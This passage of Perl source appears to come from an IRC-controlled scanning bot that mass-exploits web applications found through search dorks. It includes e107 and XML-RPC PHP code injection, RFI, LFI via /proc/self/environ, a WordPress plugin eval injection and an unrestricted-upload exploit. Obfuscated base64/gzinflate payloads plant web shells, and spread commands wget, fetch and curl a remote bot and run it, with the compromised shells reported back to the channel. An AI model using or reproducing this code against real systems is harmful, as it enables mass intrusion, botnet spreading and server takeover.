ZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJl cyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ== "; my $html = &e107_rce_query($test,$code); if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) { my $sys = $1; my $upload = ""; my $res = &e107_rce_query($test); if ($res =~ /kuloxx/) { my $check = &get_content($shellz); if ($check =~ /kulo - nuwun/) { &msg("$chan","$e107logo6$engine12 sHeLL6 $shellz ");sleep(2); } } else { &msg("$chan","$e107logo6$engine15 System12 $test 15($sys) ");sleep(2); } } } exit; } } } } sub e107_rce_query() { my $url = $_[0]; my $code = encode_base64('echo "kuloxx";')."JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhi YXNlNjRfZGVjb2RlKCJ4VWw2UXVNNEVQNThWZndINCtzcXFSWVNTK21rRlRUc1pSQ1dWd2ZsMm1WZkFG Smg0cmFHeEk1NWgyRVA4ZDlxZVNkOVRHazVRVTJKVjBpVG1YVGVIcytNMi9sSFFjdk5EVktWYjRJblZ4 T3AvZmJCNWdhVlJjaFIwa1ZWemZqRTN6VlBObFArRmthS2Q3K1ZET0xCb051N3VQWlQ1STdjZTdmdDlt S1BteHV0QjZhWVFWTEZOWXJRTGhpMWMyY0VqOGFnLzBMY3Y4WjB3K0Z5WmRZYkRQR3RSRE4rdDZidXgz OWZ4WU51WmRYdk9zQlZjV1pBWUpJUk5DZDhnc0NDcGhyZFkrUGEySEFEUm5GWmk5Mk1BdlF6NHl5WlFK YWVFU2FGeUtpM3lIOEJlYVBIbHFKMkpabWVnL3ZCMFhhY25QZEJiMlBRT3ozRkIwTEFUNjdvQzZnTEFO blFSNVpIVXhCa0twUWV6VGtwcUwrb3lHYS95ZEhKVmg5MXFuaW05MDFWWS9Jem8zNTgzaHZHSzFNRmJy bVA3OGlFNUlRSHFhU3p6eE1qQzBWRTRIcUVMVUpyRzU4UnhXWDBwemtVd3RGSDYyVS9EQnVtZ0xPbW1C dmV2VkVES2grb1ZxT3U0WVlqa0drdHdVK0N1TWtVUDFoT1duYWV2MGdLdEJnSi9hWVpSMkxId2ZQWnEx UjYyYkhQRU8vZjIwbHljTCtaM3kveDhOcFlac0dwbVYwenVsZEhNcVdydytnTmp2dmR5MjVsMnYwcnZq ZzZqejA3a0JsSW1xRjFpVHJwSFYrZHh4ZkRwTi9yRGIzYkFJZXNJQk9xd2t5NWt3dVNCYkJ4ekl4WDZw cmNCZHBUemtiYmN2NExCMnYvU0FPODd3WVlRT2xISU56UldlZjA4TDdLQmRwT3ZK cEl2Qk02VEhRazdkZlVRNFBIQWhhY2IvL1M2QU5YVWc2SDlQdFUrd0hnSVE0V0VRUGNDVlFMNHhZSWt3 ck9PTUkrRHFEQUJBVEFpclpQdngzZzluaHdYSUVCbEVPeExMS2Vpams4Z29kU2lBQ2p5VVU1K1Y2NW10 YXI0cG1qZzREWUhITkYyWU41cjdzWlNqelZZNDJnWlFiQmtIYXBaNWE1SFpjYWtYakFTUlVwTFhJcGxH TDAyMTdvMmY2enFpMmp5eW0zcXZiT25rUlZxaXZKa1pFRUFHSE85V1JTWVp1N2x2OG94TTNOLzRrQjZK OEhxUU1aeWp5Z1dSYW9NQ3NjbUw0MGFob2lsb01JNDhPWENUMFdVazVyMWhEWWJyeXNOTkx6a2xOTDA2 OGFJOE5raE5NaXcrdmFUalVxMkVYdi9HRDBRUExLdnQ4RFBqU1pIVzBINjVsRk9DRHJvcWhselZlNDdD MWhKeU9hTkprMzVaaDMvcU9FcTlKWk56cHlPYlZ5aEFiOXJKb3B5ekxLNjNtVnkzME5NQWI3VFhwdDA3 emlPdVpVNSszRkxDN296RTN2bzlVa1Nmd2JOcDMxM2g5b0hFRjA1Z0dqTkNkWFVwcXNHYmdrZUIwZTZR VzNydUExYlVvMnFtN3MybWJHelVHdHJGTEd6R1V2bHpPdzFiSnNORFpvT21EMGRSVnBCNXVsTzdqMkds ZThXOEJNa08zRFR6elF4R3luVEc4QS9nOWFaMFFtemd6MjdTS2J3SWFway9rbHJsbTFZWTgwWFFHWElz M01YbXRQWVEyak5mMmdWMGI0MjRrMGlJTHYzY0h5Mmo5TytBQTkyWFo3VTJYZDlBM0xNQ09Xc2sxTWNm YWlBcXR6SlNYMEswWk53WDB5U3BvVzNsZTZuVVhTMVMxMXVvVlZWMXluR00vUVpDcmEyOTE5aDZTWW1h ZHFGdTljK1NacmUzWWVOdmFyUHNNbWhpdm4wK0UzIikpKTsKJGZpY2hpZXIgPSBm b3BlbignLi9pbWFnZXMvbG9nLnBocCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyLCAkYyk7CmZjbG9zZSgk ZmljaGllcik7Cg=="; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code ."'))%3Bdie%28%29%3B%5B%2Fphp%5D"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7);

my $res = $ua->request($req); return $res->content; } sub e107_spread_query() { my $url = $_[0]; my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxi cj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3O2NkIC90bXA7cm0gLXJmIGRvci4qICoudHh0Lio7ZmV0 Y2ggaHR0cDovL3F1aXpjcmV3Lm5ldC9wZXJsLmpwZztwZXJsIHBlcmwuanBnO3JtIC1yZiBwZXJsLmpw Zzt3Z2V0IGh0dHA6Ly9xdWl6Y3Jldy5uZXQvcGVybC5qcGc7cGVybCBwZXJsLmpwZztybSAtcmYgcGVy bC5qcGc7Y3VybCAtTyBodHRwOi8vcXVpemNyZXcubmV0L3BlcmwuanBnO3BlcmwgcGVybC5qcGc7cm0g LXJmIHBlcmwuanBnO2x3cC1kb3dubG9hZCBodHRwOi8vcXVpemNyZXcubmV0L3BlcmwuanBnO3Blcmwg cGVybC5qcGc7Y2QgL3Zhci90bXA7cm0gLXJmIGRvci4qICouanBnLio7ZmV0Y2ggaHR0cDovL3F1aXpj cmV3Lm5ldC9wZXJsLmpwZztwZXJsIHBlcmwuanBnO3JtIC1yZiBwZXJsLmpwZzt3Z2V0IGh0dHA6Ly9x dWl6Y3Jldy5uZXQvcGVybC5qcGc7cGVybCBwZXJsLmpwZztybSAtcmYgcGVybC5qcGc7Y3VybCAtTyBo dHRwOi8vcXVpemNyZXcubmV0L3BlcmwuanBnO3BlcmwgcGVybC5qcGc7cm0gLXJmIHBlcmwuanBnO2x3 cC1kb3dubG9hZCBodHRwOi8vcXVpemNyZXcubmV0L3BlcmwuanBnO3BlcmwgcGVybC5qcGc7IjsNCiRl c2VndWljbWQ9ZXgoJGNtZCk7ZWNobyAkZXNlZ3VpY21kOw0KZnVuY3Rpb24gZXgoJGNmZSl7DQokcmVz ID0gJyc7DQppZiAoIWVtcHR5KCRjZmUpKXsNCmlmKGZ1bmN0aW9uX2V4aXN0cygn ZXhlYycpKXsNCkBleGVjKCRjZmUsJHJlcyk7DQokcmVzID0gam9pbigiXG4iLCRyZXMpOw0KfQ0KZWxz ZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKXsNCiRyZXMgPSBAc2hlbGxfZXhlYygkY2Zl KTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKXsNCkBvYl9zdGFydCgpOw0KQHN5 c3RlbSgkY2ZlKTsNCiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9 DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKXsNCkBvYl9zdGFydCgpOw0KQHBhc3N0 aHJ1KCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0N CmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3BvcGVuJykpew0KJGYgPSBAcG9wZW4oJGNmZSwiciIpOw0K d2hpbGUoIUBmZW9mKCRjZmUpKSB7ICRyZXMgLj0gQGZyZWFkKCRjZmUsMTAyNCk7IH0NCkBwY2xvc2Uo JGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=="; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$ code."'))%3Bdie%28%29%3B%5B%2Fphp%5D"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7); my $res = $ua->request($req); } sub ih_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$ihlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$ihlogo6$engine 12Finished") ; } my $ihxxx = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGV jb2RlKCJ4VWw2UXVNNEVQNThWZndINCtzcXFSWVNTK21rRlRUc1pSQ1dWd2ZsMm1WZkFGSmg0cmFHeEk 1NWgyRVA4ZDlxZVNkOVRHazVRVTJKVjBpVG1YVGVIcytNMi9sSFFjdk5EVktWYjRJblZ4T3AvZmJCNWd hVlJjaFIwa1ZWemZqRTN6VlBObFArRmthS2Q3K1ZET0xCb051N3VQWlQ1STdjZTdmdDltS1BteHV0QjZ hWVFWTEZOWXJRTGhpMWMyY0VqOGFnLzBMY3Y4WjB3K0Z5WmRZYkRQR3RSRE4rdDZidXgzOWZ4WU51WmR Ydk9zQlZjV1pBWUpJUk5DZDhnc0NDcGhyZFkrUGEySEFEUm5GWmk5Mk1BdlF6NHl5WlFKYWVFU2FGeUt pM3lIOEJlYVBIbHFKMkpabWVnL3ZCMFhhY25QZEJiMlBRT3ozRkIwTEFUNjdvQzZnTEFOblFSNVpIVXh Ca0twUWV6VGtwcUwrb3lHYS95ZEhKVmg5MXFuaW05MDFWWS9Jem8zNTgzaHZHSzFNRmJybVA3OGlFNUl RSHFhU3p6eE1qQzBWRTRIcUVMVUpyRzU4UnhXWDBwemtVd3RGSDYyVS9EQnVtZ0xPbW1CdmV2VkVES2g

rb1ZxT3U0WVlqa0drdHdVK0N1TWtVUDFoT1duYWV2MGdLdEJnSi9hWVpSMkxId2ZQWnExUjYyYkhQRU8 vZjIwbHljTCtaM3kveDhOcFlac0dwbVYwenVsZEhNcVdydytnTmp2dmR5MjVsMnYwcnZqZzZqejA3a0J sSW1xRjFpVHJwSFYrZHh4ZkRwTi9yRGIzYkFJZXNJQk9xd2t5NWt3dVNCYkJ4ekl4WDZwcmNCZHBUemt iYmN2NExCMnYvU0FPODd3WVlRT2xISU56UldlZjA4TDdLQmRwT3ZKcEl2Qk02VEhRazdkZlVRNFBIQWh hY2Iv L1M2QU5YVWc2SDlQdFUrd0hnSVE0V0VRUGNDVlFMNHhZSWt3ck9PTUkrRHFEQUJBVEFpclpQdngzZzlu aHdYSUVCbEVPeExMS2Vpams4Z29kU2lBQ2p5VVU1K1Y2NW10YXI0cG1qZzREWUhITkYyWU41cjdzWlNq elZZNDJnWlFiQmtIYXBaNWE1SFpjYWtYakFTUlVwTFhJcGxHTDAyMTdvMmY2enFpMmp5eW0zcXZiT25r UlZxaXZKa1pFRUFHSE85V1JTWVp1N2x2OG94TTNOLzRrQjZKOEhxUU1aeWp5Z1dSYW9NQ3NjbUw0MGFo b2lsb01JNDhPWENUMFdVazVyMWhEWWJyeXNOTkx6a2xOTDA2OGFJOE5raE5NaXcrdmFUalVxMkVYdi9H RDBRUExLdnQ4RFBqU1pIVzBINjVsRk9DRHJvcWhselZlNDdDMWhKeU9hTkprMzVaaDMvcU9FcTlKWk56 cHlPYlZ5aEFiOXJKb3B5ekxLNjNtVnkzME5NQWI3VFhwdDA3emlPdVpVNSszRkxDN296RTN2bzlVa1Nm d2JOcDMxM2g5b0hFRjA1Z0dqTkNkWFVwcXNHYmdrZUIwZTZRVzNydUExYlVvMnFtN3MybWJHelVHdHJG TEd6R1V2bHpPdzFiSnNORFpvT21EMGRSVnBCNXVsTzdqMkdsZThXOEJNa08zRFR6elF4R3luVEc4QS9n OWFaMFFtemd6MjdTS2J3SWFway9rbHJsbTFZWTgwWFFHWElzM01YbXRQWVEyak5mMmdWMGI0MjRrMGlJ THYzY0h5Mmo5TytBQTkyWFo3VTJYZDlBM0xNQ09Xc2sxTWNmYWlBcXR6SlNYMEswWk53WDB5U3BvVzNs ZTZuVVhTMVMxMXVvVlZWMXluR00vUVpDcmEyOTE5aDZTWW1hZHFGdTljK1NacmUzWWVOdmFyUHNNbWhp dm4wK0UzIikpKTsKJGZpY2hpZXIgPSBmb3BlbignLi9sb2cucGhwJywndycpOwpm d3JpdGUoJGZpY2hpZXIsICRjKTsKZmNsb3NlKCRmaWNoaWVyKTsK"; my $ihcek = "JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwo KZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK"; my $vuln = "http://".$site.$bug."?action=log-reset&type= ih_options();eval(base64_decode(".$ihxxx."));error"; my $cekih = "http://".$site.$bug."?action=log-reset&type =ih_options();eval(base64_decode(".$ihcek."));error"; my $shell = "http://".$site."wp-content/plugins/is-human /log.php"; my $coba = &get_content($cekih); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($coba =~ /Array<br>(.*?)<br>(.*?)gid=/){ my $uname = $1; my $uid = $2; &get_content($vuln);sleep(1); &msg("$chan","$ihlogo6$engine 12Exploitasi 15http://$site "); my $res = &get_content($shell);sleep(1); if ($res =~ /kulo - nuwun/){ &msg("$chan","$ihlogo6$engine12 sH eLL6 $shell "); } else { &msg("$chan","$ihlogo6$e ngine12 Vuln12 $site Os=$uname $uid"); } } } exit; } } } } sub rfi_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$rfilogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$rfilogo6$engine 12Finished"

); } my $coba = "http://".$site.$bug."test??"; my $test = "http://".$site.$bug.$injector."??"; my $dor = "http://".$site.$bug.$botshell."??"; my $cek = &get_content($coba); if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { &get_content($dor);sleep(1); if ($cek =~ /failed to open stream/) { my $check = &get_content($test);sleep(1) ; if ($check =~ /vito-RawckerheaD/i) { &os2($test,$chan,$engine,$rfilog o); } } } exit; } } } } sub lfi_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$lfilogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$lfilogo6$engine 12Finished" ); } my $dir = "../../../../../../../../../../../../../../../ ../../../../../../../../../"; my $test = "http://".$site.$bug.$dir."/proc/self/environ %0000"; my $shell = "http://".$site.$bug.$dir."/tmp/kulo%0000"; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTT P_USER_AGENT/) { my $res = lfi_env_query($test); # &lfi_spread_query($test); if ($res =~ /c0li#(.*?)#c0li(.*?)SUCCESS /) { my $os = $1; my $uid = $2; my $lficheck = &get_content($she ll); if ($lficheck =~ /kulo - nuwun/) { &msg("$chan","$lfilogo6$e ngine12 sHeLL6 $shell 15(OS=$os) $uid "); } else { &msg("$chan","$lfilogo6$e

ngine12 Vuln12 $site 15(OS=$os) $uid "); } } } } exit; } } } } sub lfi_env_query() { my $url = $_[0]; my $code = 'JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWxkUXVOVEZI MHVFdjl1bUZPeW93V0hla2gyQldScEtURWxkeUUwUWZvQ3lHWHNWaktMUGJaenhuRkd4SC92dlROcFZa YUYwbmZ6RXVmZVpyL09uTGxCOTNDNUtHcHFGRWFLRnlKRk9wYmFlaC92N2pBcEN4bFdTUlpGWmpGcUQ5 SElkTVRkNDFjeDdiYWlNQWpEd2ZEeTJwbkduK003NTdiZC91RnVhcWRvenhYWFZrUUpXbnhsQ0U2dEpa dkNJd2FNL2dwVDEvUjhQTDZLem9maG1ONmltNHZQVys1RThPY2tDTWZSY1RTd2dIYVJyZ0JPNHpRbXEw dk1DVkd3VVpNYmdha3huaUpaeFRPV0g2WU1vSis0NE5FY3VtZlFHT1ZTeXB4by8zaGdtenkwRkZncXlm VUswb2NuZEU1bk1ld0hrR0JyYVZPUEg0R0ZXYkZLUTVjQU1xV1pMSm4wb2VLaVEyMjZFbVRPM1BWUmp2 Mk9RZnI5RWRCSHo4enVaeUVoeVZoT28rQnZPQTQyZ3ZLWWRDNjFzOE9oeEJJaVA4M1I2aVZTUWZjSk5W blJmVzBlSzU2UlgvRkxiMDRXVFpkVW5VSERGYkRXakdZakJrb2tjZktlYmlQMUZEZUNnR2hEbHdGbTB5 czFuVDg3OXZxVW44aHRobXYzenJERWRHRWpuZCtDOGJXVGNZVmdLQnRIalNvcW1iQmFIVGpoNlhWak5Z N09CbjhFbHljWGdYQzBrREtsT2ZHZlEvM2g2ZVFpdUJ4VW8rRmo3Tnh0dExNc0Q3aFZzZ3FnK0t4clhu UE1BNW1qVnlTek5OdHQrOFFtZWRzQnZxT0VqdDRrb1NNcklRQWxpNExRcnVZNmNMMkorRjBVV0U0T1ZY VnRKK0dDY2t5M2NMMDRVZzJmRldQSkZQK2IrVCtScE1qZ3RINzhZRDY5N3JSVXZX aGFqMms3UnJCV0U5d0NjRWZCYnZ2VXBSNk1HSUVCYTlIRzZMWTkybjU0alFrRXdCQVZRbjJUS1YvQkkz RkxsL0FvbVQ4NTUxODdOOXR0UmowOFBDaFY4VGlqeWh4eWV6dk5yQktKaGtoVHlpVVVJNml0Y1puYWU1 YWd5U3F4U1BsWFdFd1d5bEwvdnROa2pCQ05lQTk5R1JQRzFUNXJqdzdKWnlVRlRvc0g0T1p4SHpic1Ur VzEvVnNsWVdIK1dBMUF2MXlrTG9TVU9VQ1p6RmFPZUFTWXZzSzlWMi9EZ1VKMjcyaFBRb3M4ajFMYUVO amxvcXcwMGF1UytVZXpMNW9TNU5pblZwN1NlbUpMV21iKzVMZHNLTG1QczhyOHZnTjhCenZyT2NmYm5U STRJSk1pcnpMTldHdmhHTnhPR3V1NDZid1pCNmY1bHhFbWNrbkVLVG5qR1ROd1p4RDllWm9GUWtZbTZt R1Y3WDBMTUlQNDJvM2F4SiswcnZuQmMzdTFpMWkyTk5GVWNiT0pqZnpJcG8xKy8xaGRWTEFsUGtPU2Ni RkZ2bzYzQW5tVHRZOUI5WnBiTy9BV3ZSdXJGUm03YVhsanMxd3JFNUZsM1BMbDB4M1llSmsrbXBpNkhR aHRNQTZ6akdUN2h0ZEJVSWxtQ3pnRE1qck1pM3NXMmV3c2pSRGdmak5SNTNKeHcyRGpycnZ4V1ptNm1l K1NDcWUxZTZSRUJid2RUSXA3NFpIWVVsbTIvRzZWSlBEWGgzVXdiRituZytWbzFDZjBtRHlhMi9hTTVF MzBEY3RqVkF4eXRUTkN6UnVyWG5pbGNac0srcmxFMEtINXdMSkp1T01qOW9VbExuTXlXODJLcUlPeFov TVZXUDVVUlNkRzVDQ0xuUmNTZit6OUF3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcvdG1wL2xvYmV4 JywndycpOwpmd3JpdGUoJGZpY2hpZXIsICRjKTsKZmNsb3NlKCRmaWNoaWVyKTsK '; my $ua = LWP::UserAgent->new(agent => "<?echo 'c0li#'.php_uname().'#c0li'.ge t_current_user();eval(base64_decode('".$code."'));echo 'SUCCESS';?>"); $ua->timeout(7); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content; } sub xml_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$xmllogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$xmllogo6$engine 12Finished" ); } my $test = "http://".$site.$bug;

my $vuln = "http://".$site."12".$bug; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /faultcode/i ) { my $resp = &xml_cek_query2($test); if ($resp =~ /Byroe(.*)KuLo/s) { &xml_spread_query($test);sleep(1); my $sys = $1; my $shell = "http://".$site."/log.php"; my $check = &get_content($shell); if ($check =~ /kulo - nuwun/) { my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1

;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$xmllogo6$engine12 sHeLL6 $shell15 (Sa feMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$xmllogo6$engine12 sHeLL6 $shell15 (S afeMode=$safe) (OS=$os) uid=$uid "); } # else { # &msg("$chan","0,1$xmllogo(4@8$engine15)15(13@12SysTem15)1 0 ".$vuln." 3".$sys); sleep(1);} } } } exit; } } } } sub xml_cek_query() { my $url = $_[0]; my $code = "system('uname -a');"; my $ua = LWP::UserAgent->new(agent => 'perl post'); $exploit = "<?xml version=\"1.0\"?><methodCall>"; $exploit .= "<methodName>test.method</methodName>"; $exploit .= "<params><param><value><name>',''));"; $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name> </value></param></params></methodCall>"; $ua->timeout(7); my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit); return $res->content; } sub xml_cek_query2() { my $url = $_[0]; my $string = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UX VOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92ek s2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZH k1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG 9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3 FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1 paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdW F1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC 91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MD RDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNT

hQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNH JQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRk F0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQ ThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrR VJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlM TlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51e Hoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOS lR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kb XVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qS kVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1S nhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPV UE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFER S9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5T FhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQ XlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmlja GllciA9IGZvcGVuKCcuL2xvYmV4LnBocCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyL CAkYyk7CmZjbG9zZSgkZmljaGllcik7Cg=="; my $ua = LWP::UserAgent->new(agent => 'perl post'); $exploit = "<?xml version=\"1.0\"?><methodCall>"; $exploit .= "<methodName>test.method</methodName>"; $exploit .= "<params><param><value><name>',''));"; $exploit .= "echo 'Byroe';echo(php_uname());eval(base64_decode(' $string'));echo 'KuLo';exit;/*</name></value></param></params></methodCall>"; $ua->timeout(7); my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit); return $res->content; } sub xml_spread_query() { my $xmltargt = $_[0]; my $xmlsprd = "system('wget ".$injector." -O log.php;fetch ".$injector.";mv bat .txt log.php;wget ".$md5bot." -O tmp.php;fetch ".$md5bot.";mv bot.txt tmp.php;ki llall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$md5bot.";php bot.txt;rm -rf bot.txt;wget ".$md5bot.";php bot.txt;rm -rf bot.txt;curl -O ".$md 5bot.";php bot.txt;rm -rf bot.txt;lwp-download ".$md5bot.";php bot.txt;cd /var/t mp;rm -rf dor.* *.jpg.*;fetch ".$md5bot.";php bot.txt;rm -rf bot.txt;wget ".$md5 bot.";php bot.txt;rm -rf bot.txt;curl -O ".$md5bot.";php bot.txt;rm -rf bot.txt; lwp-download ".$md5bot.";php bot.txt;');"; my $userAgent = LWP::UserAgent->new(agent => 'perl post'); $exploit = "<?xml version=\"1.0\"?><methodCall>"; $exploit .= "<methodName>test.method</methodName>"; $exploit .= "<params><param><value><name>',''));"; $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></pa ram></params></methodCall>"; $userAgent->timeout(7); my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', C ontent => $exploit); } sub thumb_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$thumblogo); my $num = scalar(@totexploit); if ($num > 0){

foreach my $site(@totexploit){ $count++; my $vuln = "http://".$site.$bug; my $botis = "http://".$site.$bug; my $botxc = "http://".$site.$bug; my @nbug = split(/\//,$bug); my $cek = &get_content($vuln); if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { if ($cek =~ /Saving your image/i){ &msg("$chan","$thumblogo15$engine SHELL 9h ttp://".$site."/administrator/components/com_jnewsletter/includes/openflashchart /php-ofc-library/ofc_upload_image.php"); my $pdir = $2; if ($spreadMode == 1) { &get_content($bo tis); &get_content($botxc);sleep(1); } my $crut = "http://".$site.$nbug[0].$pdi r.$md5php; my $botc = "http://".$site.$nbug[0].$pdi r.$md5bot; my $botpc = "http://".$site.$nbug[0].$pd ir.$md5botx; my $npath = "http://".$site."/administra tor/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_uploa d_image.php"; my $check = &get_content($crut."?clone") ;sleep(1); if ($check =~ /Saving your image/i){ my $safe = ""; my $os = ""; my $ uid = ""; if ($check =~ m/SAFE_MODE: <b><f ont color=blue>(.*?)<\/font>/) {$safe = $1;} if ($check =~ m/color=red><b>&nb sp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;} if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;} my $crot = &get_content($npath); sleep(1); if ($crot =~ /Saving your image/ i){ &msg("$admin","$thumblog o6$engine8 sHeLL4 ".$npath."0 (SafeMode=$safe) 